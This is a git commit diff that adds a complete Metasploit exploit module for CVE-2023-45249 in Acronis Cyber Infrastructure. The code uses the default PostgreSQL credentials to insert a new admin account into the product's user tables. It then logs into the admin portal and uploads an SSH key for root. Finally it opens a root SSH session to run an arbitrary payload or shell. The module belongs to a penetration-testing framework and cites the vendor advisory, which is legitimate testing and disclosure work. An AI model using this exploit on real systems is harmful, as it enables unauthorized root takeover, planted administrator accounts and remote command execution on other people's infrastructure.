first release module

h00die-gr3y · h00die-gr3y · commit 1ba05ac88a2f · 2024-09-15T19:47:32.000Z
diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -0,0 +1,310 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'sshkey'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include BCrypt
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Exploit::Remote::SSH
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # ssh_socket
+  attr_accessor :ssh_socket
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Acronis Cyber Infrastructure default password remote code execution',
+        'Description' => %q{
+          Acronis Cyber Infrastructure (ACI) is an IT infrastructure solution that provides storage,
+          compute, and network resources. Businesses and Service Providers are using it for data storage,
+          backup storage, creating and managing virtual machines and software-defined networks,running
+          cloud-native applications in production environments.
+          This module exploits a default password vulnerability in ACI which allow an attacker to access
+          the ACI PostgreSQL database and gain administrative access to the ACI Admin Portal.
+          This opens the door for the attacker to upload ssh keys that enables addministrative root acces
+          to the appliance/server. This attack can be remotely executed over the WAN as long as the
+          PostgreSQL and SSH services are exposed to the outside world.
+          ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
+          5.3 before build 5.3.1-53, and 5.4 before build 5.4.4-132 are vulnerable.
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Acronis International GmbH', # discovery
+        ],
+        'References' => [
+          ['CVE', '2023-45249'],
+          ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
+          ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Privileged' => true,
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'Type' => :ssh_interact,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-07-24',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8888,
+          'USERNAME' => 'vstoradmin',
+          'PASSWORD' => 'vstoradmin',
+          'DATABASE' => 'keystone',
+          'SSH_TIMEOUT' => 30,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
+      OptBool.new('STORE_CRED', [false, 'Store user admin credentials into the database.', true]),
+      OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 5432]),
+      OptPort.new('SSHPORT', [true, 'SSH port', 22])
+    ])
+    register_advanced_options([
+      OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
+    ])
+  end
+
+  def run_query(query)
+    @res_query = postgres_query(query)
+    case @res_query.keys[0]
+    when :conn_error
+      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Connection error.")
+      return false
+    when :sql_error
+      vprint_warning("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unable to execute query: #{query}.")
+      elog(@res_query[:sql_error])
+      return false
+    when :complete
+      vprint_good("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Query: #{query} successful.")
+      return true
+    else
+      vprint_error("#{postgres_conn.peerhost}:#{postgres_conn.peerport} - Unknown.")
+      return false
+    end
+  end
+
+  def add_admin_user(username, userid, password)
+    # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+    vprint_status("Creating admin user #{username} with userid #{userid}")
+
+    # add new admin user to the user table
+    return false unless run_query("insert into \"user\" values(\'#{userid}\','{}','T',NULL,NULL,NULL,'default');")
+
+    # add new admin user to the local_user table
+    return false unless run_query('select * from "local_user" where id = ( select MAX (id) from "local_user" );')
+
+    id_luser = @res_query[:complete].rows[0][0].to_i + 1
+    return false unless run_query("insert into \"local_user\" values(#{id_luser},\'#{userid}\','default',\'#{username}\',NULL,NULL);")
+
+    # hash the password
+    password_hash = Password.create(password)
+    today = Date.today
+    vprint_status("Setting password #{password} with hash #{password_hash}")
+    return false unless run_query('select * from "password" where id = ( select MAX (id) from "password" );')
+
+    id_pwd = @res_query[:complete].rows[0][0].to_i + 1
+    return false unless run_query("insert into \"password\" values(#{id_pwd},#{id_luser},NULL,'F',\'#{password_hash}\',0,NULL,DATE \'#{today}\');")
+
+    # Getting the admin roles and assign this to the new admin user
+    vprint_status('Getting the admin roles')
+    return false unless run_query("select * from \"project\" where name = 'admin' and domain_id = 'default';")
+
+    id_project_role = @res_query[:complete].rows[0][0]
+    return false unless run_query("select * from \"role\" where name = 'admin';")
+
+    id_admin_role = @res_query[:complete].rows[0][0]
+    vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
+    return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
+
+    vprint_status("Succesfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
+    true
+  end
+
+  def do_sshlogin(ip, user, ssh_opts)
+    # create SSH session.
+    # based on the ssh_opts can this be key or password based.
+    # if login is successfull, return true else return false. All other errors will trigger an immediate fail
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        self.ssh_socket = Net::SSH.start(ip, user, ssh_opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, 'Timed out during negotiation')
+    rescue Net::SSH::AuthenticationFailed
+      return false
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
+    return true
+  end
+
+  def aci_login(name, pwd)
+    # Login at the Acronis Cyber Infrastructure web portal
+    post_data = {
+      username: name.to_s,
+      password: pwd.to_s
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),
+      'data' => post_data.to_s
+    })
+    return true if res&.code == 200
+
+    false
+  end
+
+  def upload_sshkey(sshkey)
+    # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
+    post_data = {
+      key: sshkey.to_s,
+      event:
+      {
+        name: 'SshKeys',
+        method: 'post',
+        data:
+        {
+          key: sshkey.to_s
+        }
+      }
+    }.to_json
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', '1', 'ssh-keys'),
+      'data' => post_data.to_s
+    })
+    return true if res&.code == 202 && res.body.include?('task_id')
+
+    false
+  end
+
+  def execute_command(cmd, _opts = {})
+    Timeout.timeout(datastore['WfsDelay']) { ssh_socket.exec!(cmd) }
+  rescue Timeout::Error
+    @timeout = true
+  end
+
+  def check_port(port)
+    # checks network port and return true if open and false if closed.
+    Timeout.timeout(datastore['ConnectTimeout']) do
+      TCPSocket.new(datastore['RHOST'], port).close
+      return true
+    rescue StandardError
+      return false
+    end
+  rescue Timeout::Error
+    return false
+  end
+
+  def check
+    # TODO: Improve check
+    CheckCode::Appears
+  end
+
+  def exploit
+    # connect to the PostgreSQL DB with default credentials
+    fail_with(Failure::Unreachable, "Can not connect to PostgreSQL DB on port #{datastore['DBPORT']}.") unless postgres_login({ port: datastore['DBPORT'] }) == :connected
+
+    # add a new admin user
+    username = Rex::Text.rand_text_alphanumeric(5..8).downcase
+    userid = SecureRandom.hex
+    password = Rex::Text.rand_password
+    print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")
+    fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)
+
+    # Storing credentials in the msf database
+    if datastore['STORE_CRED']
+      print_status('Saving admin credentials at the msf database.')
+      store_valid_credential(user: username, private: password)
+    end
+
+    # log out from the postsgreSQL DB
+    postgres_logout if postgres_conn
+
+    # create SSH key pair
+    print_status('Creating SSH private and public key.')
+    k = SSHKey.generate(type: 'RSA', bits: 2048)
+    vprint_status(k.private_key)
+    vprint_status("#{k.ssh_public_key} root")
+
+    # log in with the new admin user credentials at the Acronis Admin Portal
+    fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
+
+    # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
+    print_status('Uploading SSH public key at the Acronis Admin Portal.')
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey("#{k.ssh_public_key} root")
+
+    # login with SSH private key to establish SSH root session
+    ssh_opts = ssh_client_defaults.merge({
+      auth_methods: ['publickey'],
+      key_data: [ k.private_key ],
+      port: datastore['SSHPORT']
+    })
+    ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    print_status('Authenticating with SSH private key.')
+    fail_with(Failure::NoAccess, 'Failed to authenticate with SSH.') unless do_sshlogin(datastore['RHOST'], 'root', ssh_opts)
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :ssh_interact
+      handler(ssh_socket)
+      return
+    end
+    @timeout ? ssh_socket.shutdown! : ssh_socket.close
+  end
+end
